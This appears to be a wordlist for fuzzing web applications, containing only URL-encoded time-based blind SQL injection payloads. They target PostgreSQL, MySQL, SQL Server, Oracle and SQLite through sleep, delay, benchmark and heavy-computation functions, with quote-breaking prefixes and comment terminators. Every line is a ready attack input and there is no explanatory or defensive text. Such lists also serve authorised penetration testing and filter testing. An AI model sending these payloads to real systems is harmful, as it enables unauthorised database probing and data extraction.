WAITFOR%20DELAY%20%220%3A0%3A5%22%3D%27
WAITFOR%20DELAY%20%220%3A0%3A5%22%3D%22
benchmark%2850000000%2CMD5%281%29%29%3D
benchmark%2850000000%2CMD5%281%29%29%3D%27
benchmark%2850000000%2CMD5%281%29%29%3D%22
DBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29%3D
DBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29%3D%27
DBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29%3D%22
or%20pg_sleep%285%29
or%20SELECT%20pg_sleep%285%29
or%20UNION%20SELECT%20pg_sleep%285%29
or%20SLEEP%285%29
or%20SELECT%20SLEEP%285%29
or%20UNION%20SELECT%20SLEEP%285%29
or%20WAITFOR%20DELAY%20%270%3A0%3A5%27
or%20WAITFOR%20DELAY%20%220%3A0%3A5%22
or%20benchmark%2850000000%2CMD5%281%29%29
or%20DBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29
or%20pg_sleep%285%29--%20-
or%20SELECT%20pg_sleep%285%29--%20-
or%20UNION%20SELECT%20pg_sleep%285%29--%20-
or%20SLEEP%285%29--%20-
or%20SELECT%20SLEEP%285%29--%20-
or%20UNION%20SELECT%20SLEEP%285%29--%20-
or%20WAITFOR%20DELAY%20%270%3A0%3A5%27--%20-
or%20WAITFOR%20DELAY%20%220%3A0%3A5%22--%20-
or%20benchmark%2850000000%2CMD5%281%29%29--%20-
or%20DBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29--%20-
or%20pg_sleep%285%29%23
or%20SELECT%20pg_sleep%285%29%23
or%20UNION%20SELECT%20pg_sleep%285%29%23
or%20SLEEP%285%29%23
or%20SELECT%20SLEEP%285%29%23
or%20UNION%20SELECT%20SLEEP%285%29%23
or%20WAITFOR%20DELAY%20%270%3A0%3A5%27%23
or%20WAITFOR%20DELAY%20%220%3A0%3A5%22%23
or%20benchmark%2850000000%2CMD5%281%29%29%23
or%20DBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29%23
or%20pg_sleep%285%29%3D
or%20pg_sleep%285%29%3D%27
or%20pg_sleep%285%29%3D%22
or%20SELECT%20pg_sleep%285%29%3D
or%20SELECT%20pg_sleep%285%29%3D%27
or%20SELECT%20pg_sleep%285%29%3D%22
or%20UNION%20SELECT%20pg_sleep%285%29%3D
or%20UNION%20SELECT%20pg_sleep%285%29%3D%27
or%20UNION%20SELECT%20pg_sleep%285%29%3D%22
or%20SLEEP%285%29%3D
or%20SLEEP%285%29%3D%27
or%20SLEEP%285%29%3D%22
or%20SELECT%20SLEEP%285%29%3D
or%20SELECT%20SLEEP%285%29%3D%27
or%20SELECT%20SLEEP%285%29%3D%22
or%20UNION%20SELECT%20SLEEP%285%29%3D
or%20UNION%20SELECT%20SLEEP%285%29%3D%27
or%20UNION%20SELECT%20SLEEP%285%29%3D%22
or%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3D
or%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3D%27
or%20WAITFOR%20DELAY%20%270%3A0%3A5%27%3D%22
or%20WAITFOR%20DELAY%20%220%3A0%3A5%22%3D
or%20WAITFOR%20DELAY%20%220%3A0%3A5%22%3D%27
or%20WAITFOR%20DELAY%20%220%3A0%3A5%22%3D%22
or%20benchmark%2850000000%2CMD5%281%29%29%3D
or%20benchmark%2850000000%2CMD5%281%29%29%3D%27
or%20benchmark%2850000000%2CMD5%281%29%29%3D%22
or%20DBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29%3D
or%20DBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29%3D%27
or%20DBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29%3D%22
pg_sleep%285%29
SELECT%20pg_sleep%285%29
UNION%20SELECT%20pg_sleep%285%29
SLEEP%285%29
SELECT%20SLEEP%285%29
UNION%20SELECT%20SLEEP%285%29
WAITFOR%20DELAY%20%270%3A0%3A5%27
WAITFOR%20DELAY%20%220%3A0%3A5%22
benchmark%2850000000%2CMD5%281%29%29
DBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29
%5C
%27%5C%27
%22%5C%22
AnD%20pg_sleep%285%29
AnD%20SELECT%20pg_sleep%285%29
AnD%20UNION%20SELECT%20pg_sleep%285%29
AnD%20SLEEP%285%29
AnD%20SELECT%20SLEEP%285%29
AnD%20UNION%20SELECT%20SLEEP%285%29
AnD%20WAITFOR%20DELAY%20%270%3A0%3A5%27
AnD%20WAITFOR%20DELAY%20%220%3A0%3A5%22
AnD%20benchmark%2850000000%2CMD5%281%29%29
AnD%20DBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29
AnD%20pg_sleep%285%29--%20-
AnD%20SELECT%20pg_sleep%285%29--%20-
AnD%20UNION%20SELECT%20pg_sleep%285%29--%20-
AnD%20SLEEP%285%29--%20-
AnD%20SELECT%20SLEEP%285%29--%20-
AnD%20UNION%20SELECT%20SLEEP%285%29--%20-
AnD%20WAITFOR%20DELAY%20%270%3A0%3A5%27--%20-
AnD%20WAITFOR%20DELAY%20%220%3A0%3A5%22--%20-
AnD%20benchmark%2850000000%2CMD5%281%29%29--%20-
AnD%20DBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29--%20-
AnD%20pg_sleep%285%29%23
AnD%20SELECT%20pg_sleep%285%29%23
AnD%20UNION%20SELECT%20pg_sleep%285%29%23
AnD%20SLEEP%285%29%23
AnD%20SELECT%20SLEEP%285%29%23
AnD%20UNION%20SELECT%20SLEEP%285%29%23
AnD%20WAITFOR%20DELAY%20%270%3A0%3A5%27%23
AnD%20WAITFOR%20DELAY%20%220%3A0%3A5%22%23
AnD%20benchmark%2850000000%2CMD5%281%29%29%23
AnD%20DBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29%23
%26%26pg_sleep%285%29
%26%26SELECT%20pg_sleep%285%29
%26%26UNION%20SELECT%20pg_sleep%285%29
%26%26SLEEP%285%29
%26%26SELECT%20SLEEP%285%29
%26%26UNION%20SELECT%20SLEEP%285%29
%26%26WAITFOR%20DELAY%20%270%3A0%3A5%27
%26%26WAITFOR%20DELAY%20%220%3A0%3A5%22
%26%26benchmark%2850000000%2CMD5%281%29%29
%26%26DBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29
%26%26pg_sleep%285%29--%20-
%26%26SELECT%20pg_sleep%285%29--%20-
%26%26UNION%20SELECT%20pg_sleep%285%29--%20-
%26%26SLEEP%285%29--%20-
%26%26SELECT%20SLEEP%285%29--%20-
%26%26UNION%20SELECT%20SLEEP%285%29--%20-
%26%26WAITFOR%20DELAY%20%270%3A0%3A5%27--%20-
%26%26WAITFOR%20DELAY%20%220%3A0%3A5%22--%20-
%26%26benchmark%2850000000%2CMD5%281%29%29--%20-
%26%26DBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29--%20-
%26%26pg_sleep%285%29%23
%26%26SELECT%20pg_sleep%285%29%23
%26%26UNION%20SELECT%20pg_sleep%285%29%23
%26%26SLEEP%285%29%23
%26%26SELECT%20SLEEP%285%29%23
%26%26UNION%20SELECT%20SLEEP%285%29%23
%26%26WAITFOR%20DELAY%20%270%3A0%3A5%27%23
%26%26WAITFOR%20DELAY%20%220%3A0%3A5%22%23
%26%26benchmark%2850000000%2CMD5%281%29%29%23
%26%26DBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29%23
%20AnD%20pg_sleep%285%29%20ANd%201
%27%20AnD%20pg_sleep%285%29%20ANd%20%271
%22%20AnD%20pg_sleep%285%29%20ANd%20%221
%20AnD%20SELECT%20pg_sleep%285%29%20ANd%201
%27%20AnD%20SELECT%20pg_sleep%285%29%20ANd%20%271
%22%20AnD%20SELECT%20pg_sleep%285%29%20ANd%20%221
%20AnD%20UNION%20SELECT%20pg_sleep%285%29%20ANd%201
%27%20AnD%20UNION%20SELECT%20pg_sleep%285%29%20ANd%20%271
%22%20AnD%20UNION%20SELECT%20pg_sleep%285%29%20ANd%20%221
%20AnD%20SLEEP%285%29%20ANd%201
%27%20AnD%20SLEEP%285%29%20ANd%20%271
%22%20AnD%20SLEEP%285%29%20ANd%20%221
%20AnD%20SELECT%20SLEEP%285%29%20ANd%201
%27%20AnD%20SELECT%20SLEEP%285%29%20ANd%20%271
%22%20AnD%20SELECT%20SLEEP%285%29%20ANd%20%221
%20AnD%20UNION%20SELECT%20SLEEP%285%29%20ANd%201
%27%20AnD%20UNION%20SELECT%20SLEEP%285%29%20ANd%20%271
%22%20AnD%20UNION%20SELECT%20SLEEP%285%29%20ANd%20%221
%20AnD%20WAITFOR%20DELAY%20%270%3A0%3A5%27%20ANd%201
%27%20AnD%20WAITFOR%20DELAY%20%270%3A0%3A5%27%20ANd%20%271
%22%20AnD%20WAITFOR%20DELAY%20%270%3A0%3A5%27%20ANd%20%221
%20AnD%20WAITFOR%20DELAY%20%220%3A0%3A5%22%20ANd%201
%27%20AnD%20WAITFOR%20DELAY%20%220%3A0%3A5%22%20ANd%20%271
%22%20AnD%20WAITFOR%20DELAY%20%220%3A0%3A5%22%20ANd%20%221
%20AnD%20benchmark%2850000000%2CMD5%281%29%29%20ANd%201
%27%20AnD%20benchmark%2850000000%2CMD5%281%29%29%20ANd%20%271
%22%20AnD%20benchmark%2850000000%2CMD5%281%29%29%20ANd%20%221
%20AnD%20DBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29%20ANd%201
%27%20AnD%20DBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29%20ANd%20%271
%22%20AnD%20DBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29%20ANd%20%221
%26%26pg_sleep%285%29%26%261
%27%26%26pg_sleep%285%29%26%26%271
%22%26%26pg_sleep%285%29%26%26%221
%26%26SELECT%20pg_sleep%285%29%26%261
%27%26%26SELECT%20pg_sleep%285%29%26%26%271
%22%26%26SELECT%20pg_sleep%285%29%26%26%221
%26%26UNION%20SELECT%20pg_sleep%285%29%26%261
%27%26%26UNION%20SELECT%20pg_sleep%285%29%26%26%271
%22%26%26UNION%20SELECT%20pg_sleep%285%29%26%26%221
%26%26SLEEP%285%29%26%261
%27%26%26SLEEP%285%29%26%26%271
%22%26%26SLEEP%285%29%26%26%221
%26%26SELECT%20SLEEP%285%29%26%261
%27%26%26SELECT%20SLEEP%285%29%26%26%271
%22%26%26SELECT%20SLEEP%285%29%26%26%221
%26%26UNION%20SELECT%20SLEEP%285%29%26%261
%27%26%26UNION%20SELECT%20SLEEP%285%29%26%26%271
%22%26%26UNION%20SELECT%20SLEEP%285%29%26%26%221
%26%26WAITFOR%20DELAY%20%270%3A0%3A5%27%26%261
%27%26%26WAITFOR%20DELAY%20%270%3A0%3A5%27%26%26%271
%22%26%26WAITFOR%20DELAY%20%270%3A0%3A5%27%26%26%221
%26%26WAITFOR%20DELAY%20%220%3A0%3A5%22%26%261
%27%26%26WAITFOR%20DELAY%20%220%3A0%3A5%22%26%26%271
%22%26%26WAITFOR%20DELAY%20%220%3A0%3A5%22%26%26%221
%26%26benchmark%2850000000%2CMD5%281%29%29%26%261
%27%26%26benchmark%2850000000%2CMD5%281%29%29%26%26%271
%22%26%26benchmark%2850000000%2CMD5%281%29%29%26%26%221
%26%26DBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29%26%261
%27%26%26DBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29%26%26%271
%22%26%26DBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29%26%26%221
ORDER%20BY%20pg_sleep%285%29
ORDER%20BY%20SELECT%20pg_sleep%285%29
ORDER%20BY%20UNION%20SELECT%20pg_sleep%285%29
ORDER%20BY%20SLEEP%285%29
ORDER%20BY%20SELECT%20SLEEP%285%29
ORDER%20BY%20UNION%20SELECT%20SLEEP%285%29
ORDER%20BY%20WAITFOR%20DELAY%20%270%3A0%3A5%27
ORDER%20BY%20WAITFOR%20DELAY%20%220%3A0%3A5%22
ORDER%20BY%20benchmark%2850000000%2CMD5%281%29%29
ORDER%20BY%20DBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29
ORDER%20BY%20pg_sleep%285%29--%20-
ORDER%20BY%20SELECT%20pg_sleep%285%29--%20-
ORDER%20BY%20UNION%20SELECT%20pg_sleep%285%29--%20-
ORDER%20BY%20SLEEP%285%29--%20-
ORDER%20BY%20SELECT%20SLEEP%285%29--%20-
ORDER%20BY%20UNION%20SELECT%20SLEEP%285%29--%20-
ORDER%20BY%20WAITFOR%20DELAY%20%270%3A0%3A5%27--%20-
ORDER%20BY%20WAITFOR%20DELAY%20%220%3A0%3A5%22--%20-
ORDER%20BY%20benchmark%2850000000%2CMD5%281%29%29--%20-
ORDER%20BY%20DBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29--%20-
ORDER%20BY%20pg_sleep%285%29%23
ORDER%20BY%20SELECT%20pg_sleep%285%29%23
ORDER%20BY%20UNION%20SELECT%20pg_sleep%285%29%23
ORDER%20BY%20SLEEP%285%29%23
ORDER%20BY%20SELECT%20SLEEP%285%29%23
ORDER%20BY%20UNION%20SELECT%20SLEEP%285%29%23
ORDER%20BY%20WAITFOR%20DELAY%20%270%3A0%3A5%27%23
ORDER%20BY%20WAITFOR%20DELAY%20%220%3A0%3A5%22%23
ORDER%20BY%20benchmark%2850000000%2CMD5%281%29%29%23
ORDER%20BY%20DBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29%23
%28SELECT%20%2A%20FROM%20%28SELECT%28pg_sleep%285%29%29%29ecMj%29
%28SELECT%20%2A%20FROM%20%28SELECT%28SELECT%20pg_sleep%285%29%29%29ecMj%29
%28SELECT%20%2A%20FROM%20%28SELECT%28UNION%20SELECT%20pg_sleep%285%29%29%29ecMj%29
%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29ecMj%29
%28SELECT%20%2A%20FROM%20%28SELECT%28SELECT%20SLEEP%285%29%29%29ecMj%29
%28SELECT%20%2A%20FROM%20%28SELECT%28UNION%20SELECT%20SLEEP%285%29%29%29ecMj%29
%28SELECT%20%2A%20FROM%20%28SELECT%28WAITFOR%20DELAY%20%270%3A0%3A5%27%29%29ecMj%29
%28SELECT%20%2A%20FROM%20%28SELECT%28WAITFOR%20DELAY%20%220%3A0%3A5%22%29%29ecMj%29
%28SELECT%20%2A%20FROM%20%28SELECT%28benchmark%2850000000%2CMD5%281%29%29%29%29ecMj%29
%28SELECT%20%2A%20FROM%20%28SELECT%28DBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29%29%29ecMj%29
%28SELECT%20%2A%20FROM%20%28SELECT%28pg_sleep%285%29%29%29ecMj%29--%20-
%28SELECT%20%2A%20FROM%20%28SELECT%28SELECT%20pg_sleep%285%29%29%29ecMj%29--%20-
%28SELECT%20%2A%20FROM%20%28SELECT%28UNION%20SELECT%20pg_sleep%285%29%29%29ecMj%29--%20-
%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29ecMj%29--%20-
%28SELECT%20%2A%20FROM%20%28SELECT%28SELECT%20SLEEP%285%29%29%29ecMj%29--%20-
%28SELECT%20%2A%20FROM%20%28SELECT%28UNION%20SELECT%20SLEEP%285%29%29%29ecMj%29--%20-
%28SELECT%20%2A%20FROM%20%28SELECT%28WAITFOR%20DELAY%20%270%3A0%3A5%27%29%29ecMj%29--%20-
%28SELECT%20%2A%20FROM%20%28SELECT%28WAITFOR%20DELAY%20%220%3A0%3A5%22%29%29ecMj%29--%20-
%28SELECT%20%2A%20FROM%20%28SELECT%28benchmark%2850000000%2CMD5%281%29%29%29%29ecMj%29--%20-
%28SELECT%20%2A%20FROM%20%28SELECT%28DBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29%29%29ecMj%29--%20-
%28SELECT%20%2A%20FROM%20%28SELECT%28pg_sleep%285%29%29%29ecMj%29%23
%28SELECT%20%2A%20FROM%20%28SELECT%28SELECT%20pg_sleep%285%29%29%29ecMj%29%23
%28SELECT%20%2A%20FROM%20%28SELECT%28UNION%20SELECT%20pg_sleep%285%29%29%29ecMj%29%23
%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29ecMj%29%23
%28SELECT%20%2A%20FROM%20%28SELECT%28SELECT%20SLEEP%285%29%29%29ecMj%29%23
%28SELECT%20%2A%20FROM%20%28SELECT%28UNION%20SELECT%20SLEEP%285%29%29%29ecMj%29%23
%28SELECT%20%2A%20FROM%20%28SELECT%28WAITFOR%20DELAY%20%270%3A0%3A5%27%29%29ecMj%29%23
%28SELECT%20%2A%20FROM%20%28SELECT%28WAITFOR%20DELAY%20%220%3A0%3A5%22%29%29ecMj%29%23
%28SELECT%20%2A%20FROM%20%28SELECT%28benchmark%2850000000%2CMD5%281%29%29%29%29ecMj%29%23
%28SELECT%20%2A%20FROM%20%28SELECT%28DBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29%29%29ecMj%29%23
%2Bbenchmark%283200%2CSHA1%281%29%29%2B
%2Bbenchmark%283200%2CSHA1%281%29%29%2B%27
%2Bbenchmark%283200%2CSHA1%281%29%29%2B%22
%2B%20pg_sleep%285%29%20%2B%20
%2B%20pg_sleep%285%29%20%2B%20%27
%2B%20pg_sleep%285%29%20%2B%20%22
%2B%20SELECT%20pg_sleep%285%29%20%2B%20
%2B%20SELECT%20pg_sleep%285%29%20%2B%20%27
%2B%20SELECT%20pg_sleep%285%29%20%2B%20%22
%2B%20UNION%20SELECT%20pg_sleep%285%29%20%2B%20
%2B%20UNION%20SELECT%20pg_sleep%285%29%20%2B%20%27
%2B%20UNION%20SELECT%20pg_sleep%285%29%20%2B%20%22
%2B%20SLEEP%285%29%20%2B%20
%2B%20SLEEP%285%29%20%2B%20%27
%2B%20SLEEP%285%29%20%2B%20%22
%2B%20SELECT%20SLEEP%285%29%20%2B%20
%2B%20SELECT%20SLEEP%285%29%20%2B%20%27
%2B%20SELECT%20SLEEP%285%29%20%2B%20%22
%2B%20UNION%20SELECT%20SLEEP%285%29%20%2B%20
%2B%20UNION%20SELECT%20SLEEP%285%29%20%2B%20%27
%2B%20UNION%20SELECT%20SLEEP%285%29%20%2B%20%22
%2B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%20%2B%20
%2B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%20%2B%20%27
%2B%20WAITFOR%20DELAY%20%270%3A0%3A5%27%20%2B%20%22
%2B%20WAITFOR%20DELAY%20%220%3A0%3A5%22%20%2B%20
%2B%20WAITFOR%20DELAY%20%220%3A0%3A5%22%20%2B%20%27
%2B%20WAITFOR%20DELAY%20%220%3A0%3A5%22%20%2B%20%22
%2B%20benchmark%2850000000%2CMD5%281%29%29%20%2B%20
%2B%20benchmark%2850000000%2CMD5%281%29%29%20%2B%20%27
%2B%20benchmark%2850000000%2CMD5%281%29%29%20%2B%20%22
%2B%20DBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29%20%2B%20
%2B%20DBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29%20%2B%20%27
%2B%20DBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29%20%2B%20%22
RANDOMBLOB%28500000000/2%29
AND%202947%3DLIKE%28ABCDEFG%2CUPPER%28HEX%28RANDOMBLOB%28500000000/2%29%29%29%29
AND%202947%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000/2%29%29%29%29
AND%202947%3DLIKE%28%22ABCDEFG%22%2CUPPER%28HEX%28RANDOMBLOB%28500000000/2%29%29%29%29
OR%202947%3DLIKE%28ABCDEFG%2CUPPER%28HEX%28RANDOMBLOB%28500000000/2%29%29%29%29
OR%202947%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%28500000000/2%29%29%29%29
OR%202947%3DLIKE%28%22ABCDEFG%22%2CUPPER%28HEX%28RANDOMBLOB%28500000000/2%29%29%29%29
RANDOMBLOB%281000000000/2%29
AND%202947%3DLIKE%28ABCDEFG%2CUPPER%28HEX%28RANDOMBLOB%281000000000/2%29%29%29%29
AND%202947%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%281000000000/2%29%29%29%29
AND%202947%3DLIKE%28%22ABCDEFG%22%2CUPPER%28HEX%28RANDOMBLOB%281000000000/2%29%29%29%29
OR%202947%3DLIKE%28ABCDEFG%2CUPPER%28HEX%28RANDOMBLOB%281000000000/2%29%29%29%29
OR%202947%3DLIKE%28%27ABCDEFG%27%2CUPPER%28HEX%28RANDOMBLOB%281000000000/2%29%29%29%29
OR%202947%3DLIKE%28%22ABCDEFG%22%2CUPPER%28HEX%28RANDOMBLOB%281000000000/2%29%29%29%29
pg_sleep%285%29/%2A%20or%20pg_sleep%285%29%20or%20%20or%20pg_sleep%285%29%20or%20%2A/
pg_sleep%285%29/%2A%27%20or%20pg_sleep%285%29%20or%20%27%27%20or%20pg_sleep%285%29%20or%20%27%2A/
pg_sleep%285%29/%2A%22%20or%20pg_sleep%285%29%20or%20%22%22%20or%20pg_sleep%285%29%20or%20%22%2A/
SELECT%20pg_sleep%285%29/%2A%20or%20SELECT%20pg_sleep%285%29%20or%20%20or%20SELECT%20pg_sleep%285%29%20or%20%2A/
SELECT%20pg_sleep%285%29/%2A%27%20or%20SELECT%20pg_sleep%285%29%20or%20%27%27%20or%20SELECT%20pg_sleep%285%29%20or%20%27%2A/
SELECT%20pg_sleep%285%29/%2A%22%20or%20SELECT%20pg_sleep%285%29%20or%20%22%22%20or%20SELECT%20pg_sleep%285%29%20or%20%22%2A/
UNION%20SELECT%20pg_sleep%285%29/%2A%20or%20UNION%20SELECT%20pg_sleep%285%29%20or%20%20or%20UNION%20SELECT%20pg_sleep%285%29%20or%20%2A/
UNION%20SELECT%20pg_sleep%285%29/%2A%27%20or%20UNION%20SELECT%20pg_sleep%285%29%20or%20%27%27%20or%20UNION%20SELECT%20pg_sleep%285%29%20or%20%27%2A/
UNION%20SELECT%20pg_sleep%285%29/%2A%22%20or%20UNION%20SELECT%20pg_sleep%285%29%20or%20%22%22%20or%20UNION%20SELECT%20pg_sleep%285%29%20or%20%22%2A/
SLEEP%285%29/%2A%20or%20SLEEP%285%29%20or%20%20or%20SLEEP%285%29%20or%20%2A/
SLEEP%285%29/%2A%27%20or%20SLEEP%285%29%20or%20%27%27%20or%20SLEEP%285%29%20or%20%27%2A/
SLEEP%285%29/%2A%22%20or%20SLEEP%285%29%20or%20%22%22%20or%20SLEEP%285%29%20or%20%22%2A/
SELECT%20SLEEP%285%29/%2A%20or%20SELECT%20SLEEP%285%29%20or%20%20or%20SELECT%20SLEEP%285%29%20or%20%2A/
SELECT%20SLEEP%285%29/%2A%27%20or%20SELECT%20SLEEP%285%29%20or%20%27%27%20or%20SELECT%20SLEEP%285%29%20or%20%27%2A/
SELECT%20SLEEP%285%29/%2A%22%20or%20SELECT%20SLEEP%285%29%20or%20%22%22%20or%20SELECT%20SLEEP%285%29%20or%20%22%2A/
UNION%20SELECT%20SLEEP%285%29/%2A%20or%20UNION%20SELECT%20SLEEP%285%29%20or%20%20or%20UNION%20SELECT%20SLEEP%285%29%20or%20%2A/
UNION%20SELECT%20SLEEP%285%29/%2A%27%20or%20UNION%20SELECT%20SLEEP%285%29%20or%20%27%27%20or%20UNION%20SELECT%20SLEEP%285%29%20or%20%27%2A/
UNION%20SELECT%20SLEEP%285%29/%2A%22%20or%20UNION%20SELECT%20SLEEP%285%29%20or%20%22%22%20or%20UNION%20SELECT%20SLEEP%285%29%20or%20%22%2A/
WAITFOR%20DELAY%20%270%3A0%3A5%27/%2A%20or%20WAITFOR%20DELAY%20%270%3A0%3A5%27%20or%20%20or%20WAITFOR%20DELAY%20%270%3A0%3A5%27%20or%20%2A/
WAITFOR%20DELAY%20%270%3A0%3A5%27/%2A%27%20or%20WAITFOR%20DELAY%20%270%3A0%3A5%27%20or%20%27%27%20or%20WAITFOR%20DELAY%20%270%3A0%3A5%27%20or%20%27%2A/
WAITFOR%20DELAY%20%270%3A0%3A5%27/%2A%22%20or%20WAITFOR%20DELAY%20%270%3A0%3A5%27%20or%20%22%22%20or%20WAITFOR%20DELAY%20%270%3A0%3A5%27%20or%20%22%2A/
WAITFOR%20DELAY%20%220%3A0%3A5%22/%2A%20or%20WAITFOR%20DELAY%20%220%3A0%3A5%22%20or%20%20or%20WAITFOR%20DELAY%20%220%3A0%3A5%22%20or%20%2A/
WAITFOR%20DELAY%20%220%3A0%3A5%22/%2A%27%20or%20WAITFOR%20DELAY%20%220%3A0%3A5%22%20or%20%27%27%20or%20WAITFOR%20DELAY%20%220%3A0%3A5%22%20or%20%27%2A/
WAITFOR%20DELAY%20%220%3A0%3A5%22/%2A%22%20or%20WAITFOR%20DELAY%20%220%3A0%3A5%22%20or%20%22%22%20or%20WAITFOR%20DELAY%20%220%3A0%3A5%22%20or%20%22%2A/
benchmark%2850000000%2CMD5%281%29%29/%2A%20or%20benchmark%2850000000%2CMD5%281%29%29%20or%20%20or%20benchmark%2850000000%2CMD5%281%29%29%20or%20%2A/
benchmark%2850000000%2CMD5%281%29%29/%2A%27%20or%20benchmark%2850000000%2CMD5%281%29%29%20or%20%27%27%20or%20benchmark%2850000000%2CMD5%281%29%29%20or%20%27%2A/
benchmark%2850000000%2CMD5%281%29%29/%2A%22%20or%20benchmark%2850000000%2CMD5%281%29%29%20or%20%22%22%20or%20benchmark%2850000000%2CMD5%281%29%29%20or%20%22%2A/
DBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29/%2A%20or%20DBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29%20or%20%20or%20DBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29%20or%20%2A/
DBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29/%2A%27%20or%20DBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29%20or%20%27%27%20or%20DBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29%20or%20%27%2A/
DBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29/%2A%22%20or%20DBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29%20or%20%22%22%20or%20DBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29%20or%20%22%2A/
%7C%7Cpg_sleep%285%29
%7C%7CSELECT%20pg_sleep%285%29
%7C%7CUNION%20SELECT%20pg_sleep%285%29
%7C%7CSLEEP%285%29
%7C%7CSELECT%20SLEEP%285%29
%7C%7CUNION%20SELECT%20SLEEP%285%29
%7C%7CWAITFOR%20DELAY%20%270%3A0%3A5%27
%7C%7CWAITFOR%20DELAY%20%220%3A0%3A5%22
%7C%7Cbenchmark%2850000000%2CMD5%281%29%29
%7C%7CDBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29
%7C%7Cpg_sleep%285%29--%20-
%7C%7CSELECT%20pg_sleep%285%29--%20-
%7C%7CUNION%20SELECT%20pg_sleep%285%29--%20-
%7C%7CSLEEP%285%29--%20-
%7C%7CSELECT%20SLEEP%285%29--%20-
%7C%7CUNION%20SELECT%20SLEEP%285%29--%20-
%7C%7CWAITFOR%20DELAY%20%270%3A0%3A5%27--%20-
%7C%7CWAITFOR%20DELAY%20%220%3A0%3A5%22--%20-
%7C%7Cbenchmark%2850000000%2CMD5%281%29%29--%20-
%7C%7CDBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29--%20-
%7C%7Cpg_sleep%285%29%23
%7C%7CSELECT%20pg_sleep%285%29%23
%7C%7CUNION%20SELECT%20pg_sleep%285%29%23
%7C%7CSLEEP%285%29%23
%7C%7CSELECT%20SLEEP%285%29%23
%7C%7CUNION%20SELECT%20SLEEP%285%29%23
%7C%7CWAITFOR%20DELAY%20%270%3A0%3A5%27%23
%7C%7CWAITFOR%20DELAY%20%220%3A0%3A5%22%23
%7C%7Cbenchmark%2850000000%2CMD5%281%29%29%23
%7C%7CDBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29%23
%27%7C%7Cpg_sleep%285%29
%22%7C%7Cpg_sleep%285%29
%27%7C%7CSELECT%20pg_sleep%285%29
%22%7C%7CSELECT%20pg_sleep%285%29
%27%7C%7CUNION%20SELECT%20pg_sleep%285%29
%22%7C%7CUNION%20SELECT%20pg_sleep%285%29
%27%7C%7CSLEEP%285%29
%22%7C%7CSLEEP%285%29
%27%7C%7CSELECT%20SLEEP%285%29
%22%7C%7CSELECT%20SLEEP%285%29
%27%7C%7CUNION%20SELECT%20SLEEP%285%29
%22%7C%7CUNION%20SELECT%20SLEEP%285%29
%27%7C%7CWAITFOR%20DELAY%20%270%3A0%3A5%27
%22%7C%7CWAITFOR%20DELAY%20%270%3A0%3A5%27
%27%7C%7CWAITFOR%20DELAY%20%220%3A0%3A5%22
%22%7C%7CWAITFOR%20DELAY%20%220%3A0%3A5%22
%27%7C%7Cbenchmark%2850000000%2CMD5%281%29%29
%22%7C%7Cbenchmark%2850000000%2CMD5%281%29%29
%27%7C%7CDBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29
%22%7C%7CDBMS_PIPE.RECEIVE_MESSAGE%28%27asfd%27%2C5%29
%27%7C%7Cpg_sleep%285%29--%20-
%22%7C%7Cpg_sleep%285%29--%20-
%27%7C%7CSELECT%20pg_sleep%285%29--%20-
